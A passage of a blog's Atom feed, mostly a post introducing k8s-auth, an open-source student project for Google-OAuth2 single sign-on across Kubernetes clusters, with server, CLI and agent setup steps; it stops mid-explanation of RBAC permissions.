          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Adam Lahbib - Adm&#34; style=&#34;--block-color:#de2336;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9hZGFtbGFoYmliLm1l&#34; data-background-image=&#34;https://media.licdn.com/dms/image/D4D03AQEeg7KDib8qCQ/profile-displayphoto-shrink_800_800/0/1682525314941?e=1691020800&amp;v=beta&amp;t=O-T0VjepTffxrdxGNc4jwwPleeh-rt6RWlMF6gol1VQ&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9hZGFtbGFoYmliLm1l&#34;&gt;Adam Lahbib - Adm&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;Backend Engineer / DevOps&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Med Sofiene Barka - NieMand&#34; style=&#34;--block-color:#02bf1b;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly93d3cuaG1sbmRyLm1lLw==&#34; data-background-image=&#34;https://pbs.twimg.com/profile_images/1607462313182756867/WHEAVH9d_400x400.jpg&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly93d3cuaG1sbmRyLm1lLw==&#34;&gt;Med Sofiene Barka - NieMand&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;Software Engineer&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Skander Soltane - RedNax&#34; style=&#34;--block-color:#ff0378;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly93d3cubGlua2VkaW4uY29tL2luL3NrYW5kZXItc29sdGFuZQ==&#34; data-background-image=&#34;https://media.licdn.com/dms/image/D4D03AQGD3BI1PkShag/profile-displayphoto-shrink_800_800/0/1676590747987?e=1691020800&amp;v=beta&amp;t=Jo1SN1nqWZCCeJ7KyxP1f6NgWUPw4DyMGmkXPQrYvWg&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly93d3cubGlua2VkaW4uY29tL2luL3NrYW5kZXItc29sdGFuZQ==&#34;&gt;Skander Soltane - RedNax&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;Software Developer&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Dr. Bassem Ben Salah&#34; style=&#34;--block-color:#de2336;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly93d3cubGlua2VkaW4uY29tL2luL2Jhc3NlbS1iZW4tc2FsYWgtMzQ4N2EyNTkv&#34; data-background-image=&#34;https://media.licdn.com/dms/image/C4D03AQEuhp7TFHjE3Q/profile-displayphoto-shrink_800_800/0/1549533675903?e=1691020800&amp;v=beta&amp;t=AuBIN0Obuyu-dqcWr2HWZMS9qJNZKzAJiw5KnuVOLSg&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly93d3cubGlua2VkaW4uY29tL2luL2Jhc3NlbS1iZW4tc2FsYWgtMzQ4N2EyNTkv&#34;&gt;Dr. Bassem Ben Salah&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;Our Supervisor&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
</content>
        <updated>2023-06-03T16:38:55.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2023/04/28/Kubernetes/k8s-auth/</id>
        <title>SSO-based authentication mechanism for multi-clusters</title>
        <link rel="alternate" href="http://example.com/2023/04/28/Kubernetes/k8s-auth/"/>
        <content type="html">&lt;h1 id=&#34;introduction&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#introduction&#34;&gt;#&lt;/a&gt; Introduction&lt;/h1&gt;
&lt;h2 id=&#34;how-it-comes&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#how-it-comes&#34;&gt;#&lt;/a&gt; How it comes&lt;/h2&gt;
&lt;p&gt;As a university student, I was assigned to create an authentication project for a specific system. But instead of choosing a traditional approach like Kerberos, I decided to spice things up and bring Kubernetes and cloud-native technologies into the mix (Typical Me). After diving into the official documentation, I was hit with a barrage of authentication strategies like X509 client certs, Static Token File, Bootstrap tokens, Service Accounts, OIDC tokens, and more. My head was spinning! Then I stumbled upon some existing authentication tools like Dex, Keycloak, and Pinniped. Terms like OIDC and OAuth2 were thrown around left and right. But I wasn’t intimidated! I accepted the challenge and declared: “It’s implementation time!” And thus, the k8s-auth project was born.&lt;/p&gt;
&lt;h2 id=&#34;why-k8s-auth-is-born&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#why-k8s-auth-is-born&#34;&gt;#&lt;/a&gt; Why k8s-auth is born&lt;/h2&gt;
&lt;p&gt;Managing access to Kubernetes clusters can be a challenging task, especially in large organizations where multiple teams and users need different levels of permissions. While Kubernetes provides a robust RBAC system, configuring and maintaining it can be time-consuming and error-prone, particularly if you have many clusters to manage.&lt;br&gt;
It can feel like you’re playing a never-ending game of whack-a-mole, trying to keep up with the constant changes and updates. And let’s be honest, it’s not the most exciting task in the world. Moving from one cluster to another, constantly changing contexts, generating kubeconfig for users, and dealing with permission problems can quickly become a chore.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/a5zaVhH.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;before-starting&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#before-starting&#34;&gt;#&lt;/a&gt; Before Starting&lt;/h2&gt;
&lt;p&gt;Before you start reading this blog post, let’s make sure you’re ready to dive into the k8s-auth server world. First, make sure you have a solid understanding of Kubernetes basics and RBAC, as we’ll be building on those concepts. Don’t worry, we won’t ask you to explain any Kubernetes concept in binary code. We just need you to understand what a service account is, what roles and role bindings mean, and why a service account needs a secret. So, if these concepts are still a mystery to you, go ahead and brush up on your Kubernetes knowledge before jumping in. And if you need a refresher, don’t worry, we won’t judge you. We’ll just send you back to Kubernetes school.&lt;/p&gt;
&lt;h1 id=&#34;k8s-auth-the-sso-based-authentication-mechanism-for-multi-clusters&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#k8s-auth-the-sso-based-authentication-mechanism-for-multi-clusters&#34;&gt;#&lt;/a&gt; K8S-AUTH : The SSO-Based Authentication Mechanism for Multi-Clusters!&lt;/h1&gt;
&lt;h2 id=&#34;what-is-k8s-auth&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#what-is-k8s-auth&#34;&gt;#&lt;/a&gt; What is k8s-auth ?&lt;/h2&gt;
&lt;p&gt;K8s-auth is a tool that provides authentication and authorization mechanisms for multiple Kubernetes clusters. With k8s-auth, users can authenticate to multiple clusters using a single set of credentials. This eliminates the need for users to have different credentials for different clusters, simplifying the authentication process. K8s-auth also allows administrators to manage user and group permissions across multiple clusters from a single centralized location, making it easier to maintain security and access control.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/awkZvAb.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;the-authentication-server&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#the-authentication-server&#34;&gt;#&lt;/a&gt; The Authentication server&lt;/h2&gt;
&lt;p&gt;“K8s-Auth Server” is an open-source authentication server designed to simplify the authorization and authentication process for users and groups within specific Kubernetes clusters. With this server, administrators can easily manage access controls for multiple clusters, all from a centralized location.&lt;/p&gt;
&lt;p&gt;With the k8s-auth server, you can say goodbye to the headache of managing RBAC configurations across multiple clusters. Instead, you can focus on the fun part of being an admin - creating users, deleting users, modifying users, creating groups, deleting groups, modifying groups, and more! And the best part? You get to do it all with a single set of credentials, like a master key that unlocks all the doors to the kingdom of Kubernetes.&lt;/p&gt;
&lt;p&gt;But wait, there’s more! With SSO-based access, users can connect to multiple clusters with different permissions based on their role on each cluster, all without having to enter a password a million times. It’s like having a backstage pass to all the coolest Kubernetes events without ever having to wait in line.&lt;/p&gt;
&lt;h2 id=&#34;how-this-server-communicate-with-clusters&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#how-this-server-communicate-with-clusters&#34;&gt;#&lt;/a&gt; How This Server Communicate with Clusters ?&lt;/h2&gt;
&lt;p&gt;K8s-Auth Server is designed to work seamlessly with K8s-Auth Controller, a cloud-native application that is deployed within the Kubernetes cluster. This controller acts as an agent for the server, facilitating communication between the server and the cluster.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/0PK9Sj5.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Before a cluster can be used with K8s-Auth Server, it must be registered with the server by the administrator. When a cluster is registered, a secret token is created, which must be used by the agent/controller deployed within the cluster to verify its existence. Once the agent/controller is verified, a connection between the cluster and the server is opened (web socket) for data communication.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/F1EVKK3.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;how-to-interact-with-this-server&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#how-to-interact-with-this-server&#34;&gt;#&lt;/a&gt; How to interact with this Server&lt;/h2&gt;
&lt;p&gt;K8s-Auth Server comes with a powerful CLI utility that can be used by both administrators and users. The CLI behaves differently based on the user’s role - administrators can create, modify, and delete users, groups, and clusters, while normal users can check the clusters that they are authorized to connect with. Once the users selects the cluster they want to authenticate with, the CLI will automatically generate a kubeconfig file, making it easy for users to connect to the cluster and start working.&lt;/p&gt;
&lt;h2 id=&#34;how-users-logs-to-the-server&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#how-users-logs-to-the-server&#34;&gt;#&lt;/a&gt; How users logs to the server&lt;/h2&gt;
&lt;p&gt;To connect to any cluster, users must first authenticate with the K8s-Auth Server. Authentication with the server is done using OAuth2 with Google, allowing users to use one set of credentials to connect to multiple clusters with different permissions based on their role on each cluster. This type of authentication can be referred to as SSO-based authentication.&lt;/p&gt;
&lt;h2 id=&#34;what-happen-when-user-want-to-authenticate-to-a-cluster&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#what-happen-when-user-want-to-authenticate-to-a-cluster&#34;&gt;#&lt;/a&gt; What happen when user want to authenticate to a cluster ?&lt;/h2&gt;
&lt;p&gt;On the user side, when a user logs into the K8s-Auth Server, they can check the clusters they are authorized to access. After selecting the desired cluster, a request is sent to the server, which checks if the user is authorized to connect. If authorized, the server sends a request to the specific agent/controller, which creates the necessary Kubernetes resources, such as service accounts, roles, role bindings, and secrets, allowing the user to connect to the cluster and return the token and ca.crt that allow the automatic generation of the kubeconfig.&lt;/p&gt;
&lt;h2 id=&#34;the-agentcontroller-role&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#the-agentcontroller-role&#34;&gt;#&lt;/a&gt; The Agent/Controller role&lt;/h2&gt;
&lt;p&gt;The agent/controller also manages the lifecycle of the secret and token, deleting them and all related roles and bindings after they expire or are no longer needed. For example, if an administrator decides to remove a user from a cluster, the agent/controller will delete the secret that holds the user’s token, as well as the service account, roles, and bindings associated with that user.&lt;/p&gt;
&lt;h2 id=&#34;before-demo&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#before-demo&#34;&gt;#&lt;/a&gt; Before DEMO&lt;/h2&gt;
&lt;div class=&#34;note danger&#34;&gt;
&lt;p&gt;Please note that this project is open source and the code is available to anyone interested. It is currently an MVP version that functions effectively, and we plan to add more features in the future.&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&#34;note warning&#34;&gt;
&lt;p&gt;Don’t forget that this project is open to contributions from the community! If you find a bug or have a feature request, feel free to open an issue on the project’s GitHub page. And if you’re interested in helping out with the development, pull requests are always welcome! Let’s work together to make this project even better.&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&#34;links&#34;&gt;&lt;div class=&#34;item&#34; title=&#34;k8s-auth-server&#34; style=&#34;--block-color:#2296fd;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tL01vaGFtZWQtUmFmcmFmL2s4cy1hdXRoLXNlcnZlcg==&#34; data-background-image=&#34;https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tL01vaGFtZWQtUmFmcmFmL2s4cy1hdXRoLXNlcnZlcg==&#34;&gt;k8s-auth-server&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;The authentication server&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;k8s-auth-kube&#34; style=&#34;--block-color:#de2336;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tL01vaGFtZWQtUmFmcmFmL2s4cy1hdXRoLWt1YmU=&#34; data-background-image=&#34;https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tL01vaGFtZWQtUmFmcmFmL2s4cy1hdXRoLWt1YmU=&#34;&gt;k8s-auth-kube&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;The Controller/Agent for k8s-auth&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;k8s-auth-cli&#34; style=&#34;--block-color:#02bf1b;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tL01vaGFtZWQtUmFmcmFmL2s4cy1hdXRoLWNsaQ==&#34; data-background-image=&#34;https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tL01vaGFtZWQtUmFmcmFmL2s4cy1hdXRoLWNsaQ==&#34;&gt;k8s-auth-cli&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;The CLI utility for k8s-auth&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;h1 id=&#34;the-demo&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#the-demo&#34;&gt;#&lt;/a&gt; The DEMO !&lt;/h1&gt;
&lt;p&gt;And the icing on the cake? I am going to show you how to set up and use k8s-auth in a demo that will blow your mind (in a good way, of course). So grab your popcorn and let’s get this Kubernetes party started!&lt;/p&gt;
&lt;p&gt;Ladies and Gentlemen, it’s showtime! Let’s get ready to k8s-authenticate! We’ll be putting the spotlight on three stars of this demo: The Authentication Server, The Agent/Controller, and the Command Line Utility! These babies were born to shine in the Go language (talk about power!) and are all open-source, so you can check them out on my GitHub page. And, to make things even easier, we’ve containerized the authentication server and agent, so you can just pull them like a cold one on a hot summer day. Check out my Docker Hub profile for more juicy details!&lt;/p&gt;
&lt;h2 id=&#34;setting-up-authentication-server&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#setting-up-authentication-server&#34;&gt;#&lt;/a&gt; Setting up Authentication Server&lt;/h2&gt;
&lt;p&gt;Hold your horses, folks! The authentication server may be containerized, but it’s not going inside Kubernetes! Don’t forget to set up those environment variables for the server - especially the admin email! (He deserve a name and a full name too, don’t they?) And guess what, the admin can log in with Google OAuth2! Just make sure to give the Client ID, Client Secret, and Redirection Link, or else things won’t work too smoothly.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You need to create an OAuth 2.0 Client with the Google API in google cloud platform!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/YqhD79J.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;K8S_AUTH_ADMIN_NAME&lt;/code&gt; : The administrator name! (My name is default value)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;K8S_AUTH_ADMIN_FULLNAME&lt;/code&gt; : The administrator name! (My name is default value)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;K8S_AUTH_ADMIN_MAIL&lt;/code&gt; : The administrator name! (My email is default value)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;OAUTH2_CLIENT_ID&lt;/code&gt; : The google Oauth2 Client ID (Required)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;OAUTH2_CLIENT_SECRET&lt;/code&gt; : The google Oauth2 Secret  (Required)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;OAUTH2_REDIRECT_URL&lt;/code&gt; : The google Oauth2 Redirect URL callback (Required, it must be redirected to /callback endpoint of your server )&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;Let’s assume that the server is deployed on &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9hdXRoLjRuNm5rOHMudGVjaA==&#34;&gt;https://auth.4n6nk8s.tech&lt;/span&gt;,&lt;br&gt;
 &lt;code&gt;OAUTH2_REDIRECT_URL&lt;/code&gt;  must be &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9hdXRoLjRuNm5rOHMudGVjaC9jYWxsYmFjaw==&#34;&gt;https://auth.4n6nk8s.tech/callback&lt;/span&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It’s docker time!  &lt;code&gt;mohamedrafraf/k8s-auth-server&lt;/code&gt;  is the docker image that you need! Let’s run this server!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;run server&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;docker run --name server -it -p 80:8080 -e OAUTH2_CLIENT_ID=xxxx -e OAUTH2_CLIENT_SECRET=xxx ... mohamedrafraf/k8s-auth-server&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Make sure to input all the necessary variables for the server to run smoothly. And once you’ve done that, sit back and relax, and let the server do its thing! Keep your hands off those logs, let them flow in peace!&lt;/p&gt;
&lt;h2 id=&#34;interacting-with-server-using-k8s-auth-cli&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#interacting-with-server-using-k8s-auth-cli&#34;&gt;#&lt;/a&gt; Interacting with server using k8s-auth CLI&lt;/h2&gt;
&lt;p&gt;It’s CLI installation time, folks! This nifty command line utility is your ticket to the k8s-auth party. With the CLI, you can log in as an admin or regular user and interact with the server based on your permission level.&lt;/p&gt;
&lt;p&gt;But wait, there’s more! For the first time, only the admin with their fancy schmancy email address can access the server. They’ll be the ones registering the cluster, setting up the agent, and creating a connection between the server and the agent. Then, it’s time to have some fun with users, groups, and permissions. Who said authentication couldn’t be funny?&lt;/p&gt;
&lt;p&gt;You can build the command line utility or download it by running:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;download cli&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;wget https://github.com/Mohamed-Rafraf/k8s-auth-cli/releases/download/test/k8s-auth&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;sudo &lt;span class=&#34;built_in&#34;&gt;chmod&lt;/span&gt; +x k8s-auth &amp;amp;&amp;amp; sudo &lt;span class=&#34;built_in&#34;&gt;mv&lt;/span&gt; k8s-auth /usr/bin&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now, you can use this command line utility just like any other tool in your system!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/EciPajC.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Before start playing with this command line you need to know that on each command you need to specify the authentication server that you want to interact with! So either you user  &lt;code&gt;--server&lt;/code&gt;  on each command or use  &lt;code&gt;K8S_AUTH_SERVER&lt;/code&gt;  environment variable to make it more easy for you! I’ll go with the 2nd option!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;export env var&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;export&lt;/span&gt; K8S_AUTH_SEVER=https://auth.4n6nk8s.tech&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now you need to log in as an adminstrator! It’s not that hard just run  &lt;code&gt;k8s-auth login&lt;/code&gt;  and forget to specify  &lt;code&gt;--admin&lt;/code&gt;  to login as the super user!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/10prjzn.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;The utility needs a secret token, which you’ll get from an URL link. This link will take you to Google for authentication and authorization as an admin. Once you’re authorized, you’ll get the secret token to paste and everything will be good to go.&lt;/p&gt;
&lt;p&gt;You’ll get something like this one in case you’re authorized!&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/Yt9FZgD.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Copy that thing don’t worry! Once you paste it, the utility will verify the token and let you know if you’re ready for your actions or not!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/MY7TTOZ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Bingo we are ready for action! Now as an admin you can register clusters, create,delete,modify users and groups (and their permissions) inside each cluster!&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Let’s assume that you have 2 clusters! You create a user inside cluster1 and you give him permission to list pods on dev namespace. You can add that user to cluster2 with other permission like create secrets on prod namespace&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It’s time to register a cluster! You’ll recieve a secret token.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/yvANfkB.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And as you see here! The cluster is registered using  &lt;code&gt;k8s-auth create cluster&lt;/code&gt;  and you can list registred clusters with  &lt;code&gt;k8s-auth get clusters&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Keep in mind that registerd cluster have 2 status, not Active when the cluster is not verified yet. The Active status will show you the API SERVER address/hostname&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Only Admins can see the tokens! Running the same command as a regular user will list you only the clusters that you have access to it (so not all cluster) and without the token!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let’s take rest now from the CLI. It’s time for kubernetes! Let’s deploy the agent/controller that will communicate with the server!&lt;/p&gt;
&lt;h2 id=&#34;deploy-the-agentcontroller-inside-kubernetes&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#deploy-the-agentcontroller-inside-kubernetes&#34;&gt;#&lt;/a&gt; Deploy the Agent/Controller inside Kubernetes&lt;/h2&gt;
&lt;p&gt;Deploying the agent is not rocket science! Deploying the agent is not rocket science! (To be honest i didn’t make a helm chart yet, Sadly 😦 ). But if you want to do it the old fashioned way, no worries! It’s still a piece of cake. Just keep in mind that you need to create a namespace called “k8s-auth” in your cluster. This namespace will contain all the service accounts and secrets of the users that authenticate and have a session with the cluster.&lt;/p&gt;
&lt;p&gt;The agent’s mission is to make sure everyone gets what they need! It creates service accounts, roles, and role bindings to make sure users have the right permissions in the cluster. That’s why the agent itself needs a service account and permissions to do its job inside the cluster.&lt;/p&gt;
&lt;p&gt;Let’s create the namespace and the service account for this agent!&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;create ns &amp; sa&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Namespace&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;status:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;meta&#34;&gt;---&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ServiceAccount&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;namespace:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;This service account need a clusterrole that allow to create roles to anything!  to grant permission for creating pods you must have this permission first! You can’t give permission of create something and you can’t do it!!!&lt;/p&gt;
&lt;p&gt;Next, the service account will need an appropriate permissions to carry out its mission inside the cluster. Specifically, it requires a clusterrole that grants permission to create roles for any resource.&lt;/p&gt;
&lt;p&gt;In kubernetes world, granting permission to create something requires that you have the permission yourself!. For example, you can’t grant permission to create pods if you don’t have permission to create pods even you have permission to create roles!!&lt;/p&gt;
